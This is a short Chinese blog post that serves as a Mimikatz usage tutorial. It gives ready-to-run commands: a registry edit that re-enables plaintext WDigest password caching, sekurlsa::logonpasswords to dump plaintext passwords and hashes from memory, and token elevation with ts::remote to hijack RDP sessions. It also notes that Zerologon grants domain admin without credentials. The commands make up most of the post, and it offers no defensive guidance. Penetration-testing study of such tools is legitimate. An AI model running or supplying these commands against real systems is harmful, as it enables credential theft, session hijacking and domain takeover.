首页 > 其他分享 >Mimikatz使用教程

Mimikatz使用教程

时间:2024-03-17 19:11:55浏览次数:25  
标签:教程 Windows Zerologon 明文 privilege Mimikatz 使用 debug

介绍

Mimikatz是一款开源的Windows安全工具,它被作者定义为“用来学习C语言和做一些Windows安全性实验的工具”。Mimikatz工具在Windows操作系统中运行时,可以从内存中提取出操作系统的明文密码、哈希、PIN码和Kerberos票据等,并支持哈希传递(pass-the-hash)、票据传递(pass-the-ticket)和构建黄金票据等功能。Mimikatz工具发展到今天,在开源社区的助力下,已经成为在内网渗透测试中必不可少的工具之一。除了本机凭证相关功能之外,Mimikatz甚至还引入了RDP远程桌面服务劫持、Zerologon自动化获取域控权限等强大的功能。
下载地址
注意:当目的为win 10或者2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Mimikatz命令

提升权限命令

privilege::debug

img

抓取明文密码

privilege::debug
sekurlsa::logonpasswords

img

会话劫持

ts::sessions   查看当前目标主机存活的会话列表
privilege::debug
token::elevate
ts::remote /id:1    将远程桌面切换到会话ID为1的用户身份中

补充点:Zerologon漏洞(CVE-2020-1472),通过该漏洞,只需要访问域控服务器的445端口,就可以在不需要任何有效凭证的情况下获取域管理员的权限。Zerologon漏洞的成因是Netlogon协议认证的加密模块存在设计缺陷,导致可以在不具备有效凭证的情况下通过认证。

标签:教程,Windows,Zerologon,明文,privilege,Mimikatz,使用,debug
From: https://www.cnblogs.com/kalixcn/p/18078964

相关文章

  • 数组基础使用
    关于数组①数组定义之后大小不能改变②数组内元素数据类型相通不允许出现不同类型③数组内的元素可以是任何数据类型包括基本数据类型和引用数据类型④数组变量属于引用类型,数组也可以看做是对象,数组的每个元素的相当于这个对象的成员变量⑤数组本身是对象Java中对象是在......
  • ST MotorControl Workbench 6.2.1 使用总结
    目录前言软件安装根据自己硬件配置参数生成代码开发板运行​ 总结前言好久没有玩ST的电机库了,已经更新到了MotorControlWorkbench6.2.1,6以上的版本比5的版本界面操作有很大的不同,核心算法有些增加。最近体验了一把使用自定义硬件配置生成代码运行,感受就是如果用官......
  • 为什么 HTTP3.0 使用 UDP 协议?
    HTTP2.0和TCP的关系HTTP2.0是2015年推出的,还是比较年轻的,其重要的二进制分帧协议、多路复用、头部压缩、服务端推送等重要优化使HTTP协议真正上了一个新台阶。像谷歌这种重要的公司并没有满足于此,而且想继续提升HTTP的性能,花最少的时间和资源获取极致体验。那肯定要问HTTP2.0......
  • LCR 088. 使用最小花费爬楼梯
    数组的每个下标作为一个阶梯,第i个阶梯对应着一个非负数的体力花费值cost[i](下标从0开始)。每当爬上一个阶梯都要花费对应的体力值,一旦支付了相应的体力值,就可以选择向上爬一个阶梯或者爬两个阶梯。请找出达到楼层顶部的最低花费。在开始时,你可以选择从下标为0或1的元素......
  • C#使用LINQ和EF Core
    在实际应用中,您可以使用LINQ查询EFCore来执行各种数据库操作。通过LINQ,您可以轻松地过滤、排序、分组和连接数据。要使用LINQ查询EFCore中的数据,您可以按照以下步骤进行操作:首先,确保您已经安装了EntityFrameworkCore包。然后,在您的C#项目中,创建一个继承自Db......
  • FTP的安装和使用
    实验环境:windowsserver虚拟机一台网络适配器:vmnet1ip:192.168.1.220一.安装FTP服务打开服务器管理器点击添加角色,勾IIS,点击下一步直到对话框消失勾选FTP从开始菜单找到管理工具打开IIS可以看见ftp服务的相关信息,说明安装成功二:新建FTP站点展开树形菜单,右键设......
  • 滴水逆向笔记系列-win32总结9-61.CE使用-62.ShellCode_远程线程注入
    第六十一课CE使用下载完CE后用ce自带的小作业练练1.第二题先打开进程Firstscan搜索100,发现有很多100,我们先让右边程序Hitme,然后Nextscan搜索96,发现已经搜出来了,正常数据会很多,就需要继续改继续搜,最后点击下面value修改为1000即可2.第三题先NewScan搜索小于500的,点击......
  • [nodejs] NodeJs/NPM入门教程
    0序nodejs是运行在服务器端的js,常用于前端工程师在本地电脑、或生产环境部署调试或运行前端工程。回想起来,上次使用nodejs,还在5年前做大学毕业设计时,基于前后端分离的实践(那时,业界正在兴起前后端分离的浪潮。当然了,现在的web工程,前后端分离已是默认的技术选择了)这次重......
  • FireDAC中FDQuery1中SQL语句中的参数使用
    假设数据库已正常连接双击FDQuery1,SQL语句中以冒号开头就是参数,后面就是参数名 然后第二Parameters页,左边列表就有就该参数名,然后给参数的DataType,Value值,再点Execute,就可看到查询结果。 其后将上面的界面,变成代码实现即可procedureTForm13.Button1Click(Sende......
  • 使用JDBC查询数据库会一次性加载所有数据吗
    前几天有个小伙伴说他有个疑问:当我们发起一个查询的时候,数据库服务器是把所有结果集都准备好,然后一次性返回给应用程序服务吗(因为他们生产有个服务因为一个报表查询搞宕机了)。这样想的原因很简单,假设那个报表查询出来有几百万数据,然后一次性倾泻给应用程序了,应用没那么大内存空......